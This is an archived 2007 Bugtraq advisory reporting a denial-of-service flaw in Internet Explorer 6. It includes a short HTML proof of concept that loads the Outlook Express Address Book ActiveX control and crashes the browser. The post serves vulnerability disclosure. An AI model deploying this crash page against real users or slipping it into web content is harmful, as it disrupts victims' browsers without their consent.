[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

IE 6 / MS Office Outlook Express Address Book Activex DoS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: IE 6 / MS Office Outlook Express Address Book Activex DoS
From: no-reply@xxxxxxxxx
Date: 6 Jun 2007 12:47:42 -0000

IE 6 / MS Office Outlook Express Address Book Activex DoS
Affected Software : MS Internet Explorer 6.x

Overview:
-----------------
when a browser use MS outlook Express Address book ActiveX , crash the browser 
immediately.
An attacker can exploit this issue to trigger denial-of-service conditions in 
Internet Explorer version 6(.x) .


PoC (HTML)
------------------

  <!--  
  [~] Microsoft Office Outlook Express Address Book DoS
  [~] Tested on windows XP sp2 , IE 6
  [~] Simorgh Security Team / www.simorgh-ev.org
  [!] Hessam-x / www.Hessamx.net
  -->
<HTML>
<object classid='clsid:233A9694-667E-11d1-9DFB-006097D50408' id='outlook' 
/></object>
<center> Microsoft Office Outlook Express Address Book DoS</center>
<center>Hessamx</center>
</HTML>

Credit
------------------
Discovered By Hessam Salehi (Hessamx)
Simorgh Security Team / www.simorgh-ev.org

Prev by Date: [ GLSA 200706-02 ] Evolution: User-assisted execution of arbitrary code
Next by Date: Remote log injection on DenyHosts, Fail2ban and BlockHosts
Previous by thread: [ GLSA 200706-02 ] Evolution: User-assisted execution of arbitrary code
Next by thread: Remote log injection on DenyHosts, Fail2ban and BlockHosts
Index(es):
- Date
- Thread